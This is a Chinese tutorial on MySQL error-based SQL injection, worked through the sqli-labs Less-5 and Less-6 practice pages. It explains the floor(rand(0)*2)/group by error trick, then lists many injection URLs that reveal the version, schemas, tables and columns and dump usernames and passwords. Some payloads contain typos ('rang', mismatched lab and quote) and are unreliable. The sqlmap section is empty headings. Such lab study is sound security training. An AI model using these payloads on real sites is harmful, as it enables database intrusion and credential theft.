一)GET报错注入
1)报错注入介绍
2)GET单引号报错注入(less5)
3)GET双引号报错注入(less6)
4)sqlmap安全测试
二)补充知识
————————————————————————————————————————————————————————
一)GET报错注入
1)报错注入介绍
通过报错来显示出具体的信息,报错需要count(*),rand()、group by,三者缺一不可
。其中,对于报错注入几个常用函数进行讲解:
rand()————随机函数,返回0~1之间的某个值,它看起来每次获取的都是一个随机数,但其实它是通过一个
固定的随机数的种子0并形成固定的伪随机序列;也就是说如果只是select rand() from
users; 那么每次产生的数都不同,但如果是select rand(0) from users;那么,每次产生
的值就是为伪随机(产生的数据都是可预知的)。
那么又为什么floor报错注入利用的时候rand(0)*2为什么要乘以2呢?这就要配合floor 函数来解释了:
floor()————取整函数,返回小于等于a的最大整数,也就是取整;
floor(rand(0)*2)就是对rand(0)产生的随机序列乘以2后的结果,再进行取整后得到伪随机序列011011;
count()————聚合函数,返回查询对象的总数;
group by————分组语句,按照查询结果分组(相同的分为一组);
报错的原理分析:
count()是计数函数,当count和group by合在一起用就会建立一个虚拟表,来数(shǔ)数(shù)。虚拟表如下所示(其中的key是主键,是不可以重复的):
此时如果取数据库数据,那么就会先查看虚拟表是否存在此记录,不存在就插入新记录,存在则count(*)字段直接加1,虚表中写入第三条记录是时,产生了报错。此时floor(rand(0)*2)一共被计算了5次,最少3条数据才会报错的原因。(floor(rand(0)*2)为0时,不用计算直接丢弃)。
2)GET单引号报错注入
因为报错型注入并不像之前的联合查询用union select就会显示出信息,所以需要利用count()、floor()、rand()、group by 一起构造payload:
id=-1' union select 1,2,3 from (select count(*),concat((select concat(version() ,database(),user() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
解析:由外到内层层拆解,由内到外层层执行
1)union select 1,2,3 from ()a --+
2)select count(*),concat()x from information_schema.tables group by x
3)(),floor(rand(0)*2)
4)select concat() limit 0,1 ---根据不同需求只有此处的concat的内容在变换
5)version(),0x3a,0x3a,databasse(),0x3a,0x3a,user(),0x3a
注:对于 concat((select concat(version() ,database(),user() limit 0,1),floor(rand(0)*2)),内部concat是为了将版本~库~用户连接起来,外部concat是为了将内部concat的结果和floor()连接起来。
less5:
不确定闭合的方法就使用:http://192.168.67.140/sqli/Less-5/?id=1\
获取数据库信息:
构造url:
http://192.168.67.140/sqli/Less-5/?id=-1' union select 1,2,3 from (select count(*),concat((select concat(version(),0x7e,0x7e,database(),0x7e,0x7e,user(),0x7e)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
或者:
http://192.168.67.140/sqli/Less-5/?id=-1' and (select 1 from (select count(*),concat((select (select (select concat(0x7e,version(),0x7e,0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
获取所有库:
http://192.168.67.140/sqli/Less-5/?id=-1' union select 1,2,3 from (select count(*),concat((select concat(schema_name,0x7e,0x7e)from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
或者:
http://192.168.67.140/sqli/Less-5/?id=-1' and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
获取指定库所有表:
http://192.168.67.140/sqli/Less-5/?id=-1' union select 1,2,3 from (select count(*),concat((select concat(table_name,0x7e,0x7e)from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
或者:
http://192.168.67.140/sqli/Less-5/?id=-1' and (select 1 from (select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
获取指定库中指定表中的所有字段:
http://192.168.67.140/sqli/Less-5/?id=-1' union select 1,2,3 from (select count(*),concat((select concat(column_name,0x7e,0x7e) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1) ,floor(rand(0)*2))x from information_schema.tables group by x)a --+
或者:
http://192.168.67.140/sqli/Less-5/?id=-1' and (select 1 from (select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='users' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
dump出数据:
http://192.168.67.140/sqli/Less-5/?id=-1' union select 1,2,3 from (select count(*),concat((select concat(username,0x7e,0x7e,password,0x7e,0x7e) from users limit 0,1) ,floor(rand(0)*2))x from information_schema.tables group by x)a --+
或者:
http://192.168.67.140/sqli/Less-5/?id=-1' and (select 1 from (select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
3)GET双引号报错注入
less6:
获取数据库信息:
http://192.168.67.140/sqli/Less-6/?id=-1" union select 1,2,3 from (select count(*),concat((select concat(version(),0x7e,0x7e,database(),0x7e,0x7e,user(),0x7e)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
或者:
http://192.168.67.140/sqli/Less-6/?id=-1" and (select 1 from (select count(*),concat((select (select (select concat(0x7e,version(),0x7e,0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
获取所有库:
http://192.168.67.140/sqli/Less-6/?id=-1" union select 1,2,3 from (select count(*),concat((select concat(schema_name,0x7e,0x7e)from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
http://192.168.67.140/sqli/Less-5/?id=-1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
获取指定库所有表:
http://192.168.67.140/sqli/Less-6/?id=-1" union select 1,2,3 from (select count(*),concat((select concat(table_name,0x7e,0x7e)from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
或者:
http://192.168.67.140/sqli/Less-5/?id=-1" and (select 1 from (select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
获取指定库中指定表中的所有字段:
http://192.168.67.140/sqli/Less-6/?id=-1" union select 1,2,3 from (select count(*),concat((select concat(column_name,0x7e,0x7e) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1) ,floor(rand(0)*2))x from information_schema.tables group by x)a --+
或者:
http://192.168.67.140/sqli/Less-5/?id=-1" and (select 1 from (select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='users' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
dump出数据:
http://192.168.67.140/sqli/Less-5/?id=-1" union select 1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from users limit 0,1) ,floor(rang(0)*2))x from information_schema.tables group by x)a --+
或者:
http://192.168.67.140/sqli/Less-5/?id=-1" and (select 1 from (select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
4)sqlmap安全测试
探测是否存在SQL注入:
获取数据库:
获取指定库中的表:
获取指定表中的字段:
dump数据:
二)扩补充知识